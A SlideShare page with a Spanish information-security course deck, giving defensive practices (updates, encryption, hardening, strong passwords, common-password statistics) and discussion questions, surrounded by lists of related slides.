       p   Redes inalámbricas: Kismet, Network Stumbler , ApSniffer
Seguridad de la información



   NORMAS A SEGUIR
Seguridad de la información
p Normas        de defensa
  n   Respetar las políticas de seguridad

  n   Antivirus + Firewall

  n   Siempre tener nuestros servicios, sistemas operativos y
      aplicaciones actualizadas a la última versión conocida
      estable

  n   Utilizar mecanismos de criptografía para almacenar y
      transmitir datos sensibles

  n   Cambiar las claves cada cierto tiempo
Seguridad de la información
p   Normas de defensa
    n   Asignar un responsable de seguridad

    n   Auto-auditar nuestros propios servicios

    n   Autoatacarnos para saber si somos o no vulnerables

    n   Estar siempre alerta. Es muy común: ”a nosotros nadie nos
        ataca”.

    n   No dejar información sensible en directorios web

    n   No usar las mismas claves para servicios distintos
         p   Muy común: la clave de root sea la misma que la de MySQL y la misma que
             Apache ...
Seguridad de la información
p Normas        de defensa
  n   Cambiar los puertos por defecto en servicios no públicos

  n   Aplicar técnicas de Hardening

  n   Para servicios privados y confidenciales utilizar túneles
      seguros (VPN cifradas) en Internet y redes no seguras

  n   Habilitar módulos de seguridad (Ej mod_security en
      Apache)
Seguridad de la información
p Normas        de defensa

  n   Nunca trabajar con ”root” si no es estrictamente necesario

  n   Cerrar puertos y eliminar aplicaciones innecesarias

  n   Proteger las URL (ej: mod_rewrite, o AJAX)
Seguridad de la información
p Normas         de defensa
  n   Elegir contraseñas seguras, mezclando mayúsculas,
      minúsculas, números y caracteres especiales.

  n   Las claves no deben ser palabras coherentes ni de
      diccionario

  n   10 contraseñas mas usadas en la red de 32 millones

       p   123456-12345-123456789-password-iloveyou-princess-
           rockyou-1234567-12345678-abc123
Seguridad de la información
Seguridad de la información
p   Normas de defensa
    n   Datos:
         p   16% usa su primer nombre como contraseña.
         p   14% usa combinaciones excesivamente fáciles de recordar como
             1234, 123456, QWERTY
         p   5% eran nombres de celebridades tipo hanna, matrix o ironman.
         p   4% corresponden a palabras como password o password1.
         p   3% llegan a los límites del WTFismo con simples si, no, whatever.


    n   Contraseña segura simple: s+6o1e$7

    n   Herramientas:
         p http://keepass.info/: almacena
         p http://passworg.badhim.com/: genera y valida
Seguridad de la información


  “Seguridad no es un
       producto,
    es un proceso.”
                      Bruce Schneier
Seguridad de la información


http://www.rompecadenas.com.ar/
http://foro.portalhacker.net/
http://www.elhacker.org
http://www.kriptopolis.org/
Seguridad de la información

More Related Content

What's hot

Seguridad de la informacion
Seguridad de la informacionSeguridad de la informacion
Seguridad de la informacionalexaloaiza
 
Aplicaciones de Sistema Importantes Para la Era Digital GS
Aplicaciones de Sistema Importantes Para la Era Digital GSAplicaciones de Sistema Importantes Para la Era Digital GS
Aplicaciones de Sistema Importantes Para la Era Digital GSPlaza Jacaranda, Bonao
 
Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Iestp Instituto Superior
 
Control interno-informatico
Control interno-informaticoControl interno-informatico
Control interno-informaticorichycc7
 
Foro primer bloque teoria de la seguridad
Foro primer bloque teoria de la seguridadForo primer bloque teoria de la seguridad
Foro primer bloque teoria de la seguridadMao Sierra
 
Information security for dummies
Information security for dummiesInformation security for dummies
Information security for dummiesIvo Depoorter
 
Propuesta De Empresa. Estructura Y OrganizacióN Tic
Propuesta De Empresa. Estructura Y OrganizacióN TicPropuesta De Empresa. Estructura Y OrganizacióN Tic
Propuesta De Empresa. Estructura Y OrganizacióN TicOriol Recasens
 
Comercio electrónico. Power Point
Comercio electrónico. Power PointComercio electrónico. Power Point
Comercio electrónico. Power PointTefy1422
 
Técnicas de hackers
Técnicas de hackersTécnicas de hackers
Técnicas de hackerslisaneyC
 
Auditoria en desarrollo de sistemas diapo[1]
Auditoria en desarrollo de sistemas diapo[1]Auditoria en desarrollo de sistemas diapo[1]
Auditoria en desarrollo de sistemas diapo[1]caramelomix
 
La importancia del manejo de la evidencia digital
La importancia del manejo de la evidencia digitalLa importancia del manejo de la evidencia digital
La importancia del manejo de la evidencia digitalHacking Bolivia
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control PresentationWajahat Rajab
 
Controles
ControlesControles
Controlesfbogota
 
Ensayo unidad4
Ensayo unidad4Ensayo unidad4
Ensayo unidad4mCarmen32
 

What's hot (20)

Seguridad de la informacion
Seguridad de la informacionSeguridad de la informacion
Seguridad de la informacion
 
Aplicaciones de Sistema Importantes Para la Era Digital GS
Aplicaciones de Sistema Importantes Para la Era Digital GSAplicaciones de Sistema Importantes Para la Era Digital GS
Aplicaciones de Sistema Importantes Para la Era Digital GS
 
Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799Seguridad y auditoria informatica, iso 17799
Seguridad y auditoria informatica, iso 17799
 
Control interno-informatico
Control interno-informaticoControl interno-informatico
Control interno-informatico
 
Introducción a la Ciberseguridad
Introducción a la CiberseguridadIntroducción a la Ciberseguridad
Introducción a la Ciberseguridad
 
Foro primer bloque teoria de la seguridad
Foro primer bloque teoria de la seguridadForo primer bloque teoria de la seguridad
Foro primer bloque teoria de la seguridad
 
Presentacion comercio electronico
Presentacion comercio electronicoPresentacion comercio electronico
Presentacion comercio electronico
 
Information security for dummies
Information security for dummiesInformation security for dummies
Information security for dummies
 
Security policies
Security policiesSecurity policies
Security policies
 
Propuesta De Empresa. Estructura Y OrganizacióN Tic
Propuesta De Empresa. Estructura Y OrganizacióN TicPropuesta De Empresa. Estructura Y OrganizacióN Tic
Propuesta De Empresa. Estructura Y OrganizacióN Tic
 
Comercio electrónico. Power Point
Comercio electrónico. Power PointComercio electrónico. Power Point
Comercio electrónico. Power Point
 
Técnicas de hackers
Técnicas de hackersTécnicas de hackers
Técnicas de hackers
 
Auditoria en desarrollo de sistemas diapo[1]
Auditoria en desarrollo de sistemas diapo[1]Auditoria en desarrollo de sistemas diapo[1]
Auditoria en desarrollo de sistemas diapo[1]
 
La importancia del manejo de la evidencia digital
La importancia del manejo de la evidencia digitalLa importancia del manejo de la evidencia digital
La importancia del manejo de la evidencia digital
 
Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
Informatica forense
Informatica forenseInformatica forense
Informatica forense
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control Presentation
 
Controles
ControlesControles
Controles
 
Ensayo unidad4
Ensayo unidad4Ensayo unidad4
Ensayo unidad4
 

Viewers also liked

Seguridad en sitios web
Seguridad en sitios webSeguridad en sitios web
Seguridad en sitios webUTPL
 
Seguridad de Aplicaciones Web
Seguridad de Aplicaciones WebSeguridad de Aplicaciones Web
Seguridad de Aplicaciones WebGabriel Arellano
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Webguest80e1be
 
Housing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHousing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHosting y Dominio
 
Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1cheo.silva
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Arquitectura de seguridad de redes
Arquitectura de seguridad de redesArquitectura de seguridad de redes
Arquitectura de seguridad de redesJuan MmnVvr Aguila
 
Modulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresModulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresJuan Manuel García
 
Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2netmind
 
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...eccutpl
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaJuan Manuel García
 
Seguridad en la nube exposicion completa
Seguridad en la nube   exposicion completaSeguridad en la nube   exposicion completa
Seguridad en la nube exposicion completaMaxwell Kenshin
 
MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000Oscar Limachi
 

Viewers also liked (20)

Seguridad en sitios web
Seguridad en sitios webSeguridad en sitios web
Seguridad en sitios web
 
Seguridad de Aplicaciones Web
Seguridad de Aplicaciones WebSeguridad de Aplicaciones Web
Seguridad de Aplicaciones Web
 
Seguridad en aplicaciones web
Seguridad en aplicaciones web Seguridad en aplicaciones web
Seguridad en aplicaciones web
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Servicios de red complementarios
Servicios de red complementariosServicios de red complementarios
Servicios de red complementarios
 
Seguridad en la nube
Seguridad en la nubeSeguridad en la nube
Seguridad en la nube
 
Housing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHousing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en Chile
 
Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1
 
Examen
ExamenExamen
Examen
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Arquitectura de seguridad de redes
Arquitectura de seguridad de redesArquitectura de seguridad de redes
Arquitectura de seguridad de redes
 
Modulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresModulo III: Seguridad en Servidores
Modulo III: Seguridad en Servidores
 
Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2
 
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
 
Riesgo vs rendimiento
Riesgo vs rendimientoRiesgo vs rendimiento
Riesgo vs rendimiento
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad Informática
 
Seguridad en la nube exposicion completa
Seguridad en la nube   exposicion completaSeguridad en la nube   exposicion completa
Seguridad en la nube exposicion completa
 
MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000
 
Protocolos De Seguridad
Protocolos De SeguridadProtocolos De Seguridad
Protocolos De Seguridad
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 

Similar to Seguridad Web

Seguridad de la información
Seguridad de la informaciónSeguridad de la información
Seguridad de la informaciónTensor
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad InformaticaMini0986
 
WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3Ceci Acoltzi
 
Presentación tema 4
Presentación tema 4Presentación tema 4
Presentación tema 4sebi16
 
Power informática
Power informáticaPower informática
Power informática10405878
 
Power informática
Power informáticaPower informática
Power informática10405878
 
C:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaC:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaguestc28d961
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaEvaCuenca
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticapaulabas
 
Trabajo Unificado De Seg Inform
Trabajo Unificado De Seg InformTrabajo Unificado De Seg Inform
Trabajo Unificado De Seg Informpachiuss
 
Violeta Sánchez Rodríguez
Violeta Sánchez RodríguezVioleta Sánchez Rodríguez
Violeta Sánchez Rodríguezcarmelacaballero
 
Tema 4, seguridad informática
Tema 4, seguridad informáticaTema 4, seguridad informática
Tema 4, seguridad informáticaHectorCardona99
 
Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.carmelacaballero
 

Similar to Seguridad Web (20)

Seguridad de la información
Seguridad de la informaciónSeguridad de la información
Seguridad de la información
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
5to
5to5to
5to
 
WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3
 
Presentación tema 4
Presentación tema 4Presentación tema 4
Presentación tema 4
 
Power informática
Power informáticaPower informática
Power informática
 
Power informática
Power informáticaPower informática
Power informática
 
C:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaC:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Trabajo Unificado De Seg Inform
Trabajo Unificado De Seg InformTrabajo Unificado De Seg Inform
Trabajo Unificado De Seg Inform
 
Presentación1
Presentación1Presentación1
Presentación1
 
Presentación1
Presentación1Presentación1
Presentación1
 
Violeta Sánchez Rodríguez
Violeta Sánchez RodríguezVioleta Sánchez Rodríguez
Violeta Sánchez Rodríguez
 
Tema 4, seguridad informática
Tema 4, seguridad informáticaTema 4, seguridad informática
Tema 4, seguridad informática
 
Seguridad(2)
 Seguridad(2) Seguridad(2)
Seguridad(2)
 
Seguridad Y Amenazas
Seguridad Y AmenazasSeguridad Y Amenazas
Seguridad Y Amenazas
 
Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.
 
Blogger
BloggerBlogger
Blogger
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICA
 

More from ramos866

Presentacion sonido
Presentacion sonidoPresentacion sonido
Presentacion sonidoramos866
 
Diseno grafico dojo_v1
Diseno grafico dojo_v1Diseno grafico dojo_v1
Diseno grafico dojo_v1ramos866
 
Presentacion impress v1
Presentacion impress v1Presentacion impress v1
Presentacion impress v1ramos866
 
Presentacion Tm
Presentacion TmPresentacion Tm
Presentacion Tmramos866
 
Videodixital Sesion 5 Accesorios
Videodixital Sesion 5 AccesoriosVideodixital Sesion 5 Accesorios
Videodixital Sesion 5 Accesoriosramos866
 
Videodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video InternetVideodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video Internetramos866
 
Videodixital Sesion 4 Camaras
Videodixital Sesion 4 CamarasVideodixital Sesion 4 Camaras
Videodixital Sesion 4 Camarasramos866
 
Videodixital Sesion 3 Formatos
Videodixital Sesion 3 FormatosVideodixital Sesion 3 Formatos
Videodixital Sesion 3 Formatosramos866
 
Videodixital Sesion 2 Conceptos
Videodixital Sesion 2 ConceptosVideodixital Sesion 2 Conceptos
Videodixital Sesion 2 Conceptosramos866
 
Videodixital Sesion 1 Introduccion
Videodixital Sesion 1 IntroduccionVideodixital Sesion 1 Introduccion
Videodixital Sesion 1 Introduccionramos866
 
Rez Libris
Rez LibrisRez Libris
Rez Librisramos866
 
Object Oriented Programming Course
Object Oriented Programming CourseObject Oriented Programming Course
Object Oriented Programming Courseramos866
 
Cooperative Extension System
Cooperative Extension SystemCooperative Extension System
Cooperative Extension Systemramos866
 
Timeline Of Earth
Timeline Of EarthTimeline Of Earth
Timeline Of Earthramos866
 
Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01ramos866
 
Ejercicios PHP
Ejercicios PHPEjercicios PHP
Ejercicios PHPramos866
 
Ejercicios Word 01
Ejercicios Word 01Ejercicios Word 01
Ejercicios Word 01ramos866
 

More from ramos866 (20)

Presentacion sonido
Presentacion sonidoPresentacion sonido
Presentacion sonido
 
Diseno grafico dojo_v1
Diseno grafico dojo_v1Diseno grafico dojo_v1
Diseno grafico dojo_v1
 
Comic2
Comic2Comic2
Comic2
 
Presentacion impress v1
Presentacion impress v1Presentacion impress v1
Presentacion impress v1
 
Web 20
Web 20Web 20
Web 20
 
Presentacion Tm
Presentacion TmPresentacion Tm
Presentacion Tm
 
Videodixital Sesion 5 Accesorios
Videodixital Sesion 5 AccesoriosVideodixital Sesion 5 Accesorios
Videodixital Sesion 5 Accesorios
 
Videodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video InternetVideodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video Internet
 
Videodixital Sesion 4 Camaras
Videodixital Sesion 4 CamarasVideodixital Sesion 4 Camaras
Videodixital Sesion 4 Camaras
 
Videodixital Sesion 3 Formatos
Videodixital Sesion 3 FormatosVideodixital Sesion 3 Formatos
Videodixital Sesion 3 Formatos
 
Videodixital Sesion 2 Conceptos
Videodixital Sesion 2 ConceptosVideodixital Sesion 2 Conceptos
Videodixital Sesion 2 Conceptos
 
Videodixital Sesion 1 Introduccion
Videodixital Sesion 1 IntroduccionVideodixital Sesion 1 Introduccion
Videodixital Sesion 1 Introduccion
 
Rez Libris
Rez LibrisRez Libris
Rez Libris
 
Object Oriented Programming Course
Object Oriented Programming CourseObject Oriented Programming Course
Object Oriented Programming Course
 
InSLed
InSLedInSLed
InSLed
 
Cooperative Extension System
Cooperative Extension SystemCooperative Extension System
Cooperative Extension System
 
Timeline Of Earth
Timeline Of EarthTimeline Of Earth
Timeline Of Earth
 
Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01
 
Ejercicios PHP
Ejercicios PHPEjercicios PHP
Ejercicios PHP
 
Ejercicios Word 01
Ejercicios Word 01Ejercicios Word 01
Ejercicios Word 01
 

Recently uploaded

TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOweislaco
 
Concurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxConcurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxkeithgiancarloroquef
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsxJuanpm27
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesRaquel Martín Contreras
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxSIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxLudy Ventocilla Napanga
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfManuel Molina
 
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxPROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxEribertoPerezRamirez
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfDaniel Ángel Corral de la Mata, Ph.D.
 
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfPresentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfSarayLuciaSnchezFigu
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressionsConsueloSantana3
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docxLuisAndersonPachasto
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Angélica Soledad Vega Ramírez
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOEveliaHernandez8
 
Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Rosabel UA
 
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO YESSENIA 933623393 NUEV...
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO  YESSENIA 933623393 NUEV...IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO  YESSENIA 933623393 NUEV...
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO YESSENIA 933623393 NUEV...YobanaZevallosSantil1
 
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdfFichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdfssuser50d1252
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxNataliaGonzalez619348
 
DETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORDETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORGonella
 

Recently uploaded (20)

TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJOTUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
TUTORIA II - CIRCULO DORADO UNIVERSIDAD CESAR VALLEJO
 
Concurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxConcurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptx
 
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
3. Pedagogía de la Educación: Como objeto de la didáctica.ppsx
 
Técnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materialesTécnicas de grabado y estampación : procesos y materiales
Técnicas de grabado y estampación : procesos y materiales
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docxSIMULACROS Y SIMULACIONES DE SISMO 2024.docx
SIMULACROS Y SIMULACIONES DE SISMO 2024.docx
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
 
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxPROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
 
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfPresentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressions
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
 
Aedes aegypti + Intro to Coquies EE.pptx
Aedes aegypti + Intro to Coquies EE.pptxAedes aegypti + Intro to Coquies EE.pptx
Aedes aegypti + Intro to Coquies EE.pptx
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...
 
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADOCUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
CUADERNILLO DE EJERCICIOS PARA EL TERCER TRIMESTRE, SEXTO GRADO
 
Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024
 
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO YESSENIA 933623393 NUEV...
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO  YESSENIA 933623393 NUEV...IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO  YESSENIA 933623393 NUEV...
IV SES LUN 15 TUTO CUIDO MI MENTE CUIDANDO MI CUERPO YESSENIA 933623393 NUEV...
 
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdfFichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
 
DETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORDETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIOR
 

Seguridad Web

  • 1. Experto en gestión de seguridad de la información JORNADA 2 ramos valcárcel, david david@uvigo.es
  • 2. Seguridad de la información 1. En vuestra empresa, vida diaria, que problemas de seguridad apreciáis 2. Estáis preparados ante vulnerabilidades físicas 3. Cada cuanto tiempo hacéis copias de seguridad y dónde las guardáis 4. Creéis que sois vulnerables a la ingeniería social 5. Empleáis el email para enviar información confidencial 6. En donde creéis que debemos invertir más en seguridad Infraestructuras – hardware – software – personal 7. De 0 a 10, que importancia le dais a la información que manejáis en la empresa 8. De 0 a 10, como consideráis de seguras vuestras contraseñas 9. Se puede hacer un sistema 100% seguro
